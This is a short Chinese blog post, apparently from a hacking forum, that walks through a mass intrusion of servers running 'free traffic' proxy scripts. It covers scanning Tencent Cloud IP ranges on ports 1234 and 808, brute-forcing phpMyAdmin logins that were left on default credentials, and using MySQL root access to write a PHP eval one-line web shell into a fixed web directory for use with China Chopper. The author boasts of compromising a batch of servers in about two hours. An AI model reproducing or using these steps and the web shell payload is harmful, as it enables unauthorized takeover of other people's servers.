上一篇文章说篇幅太少,其实操作就那样,没必要一步一步的说明,有的朋友给我发邮件私聊了下,很简单就复现了。

接下来正文,之前发现某些免流脚本,都是默认密码,数据库管理都是phpmyadmin,lnmp自动安装的,有些选项都没有让用户自己填写,导致了批量shell。简介就是这样。坛子里好像是有过入侵的,不过是通过burp爆破phpmyadmin。通用了一下,大家就明白了吧。
首先我了解到免流的web服务通常使用1234端口和808端口,那么开始找腾讯云的ip段进行扫描。

QQ20190331-132728@2x.png

扫描后复制下来保存到记事本中,批量处理下后缀名。
QQ20190331-132735@2x.png
保存ip之后导入,设置用户名,密码字典等。
QQ20190331-132742@2x.png
QQ20190331-132750@2x.png
开始爆破。
爆破之后导出ip和密码
QQ20190331-132800@2x.png
之前有过某个做黑产的牛发的扫过的。
逐条打开测试
QQ20190331-132809@2x.png
登陆phpmyadmin
点击sql,既然是mysql的root权限,那就可以通过找到绝对路径后写shell,
而脚本安装都是统一的目录,而且安装的是lnmp环境。So

 select '<?php @eval($_POST[1111])?>' into outfile '/home/wwwroot/default/admin/index1.php'

一句话写入,这样的话可以用菜刀连接了
QQ20190331-132818@2x.png

这是之前搞得12月份的批量,基本两个小时。

标签: none

添加新评论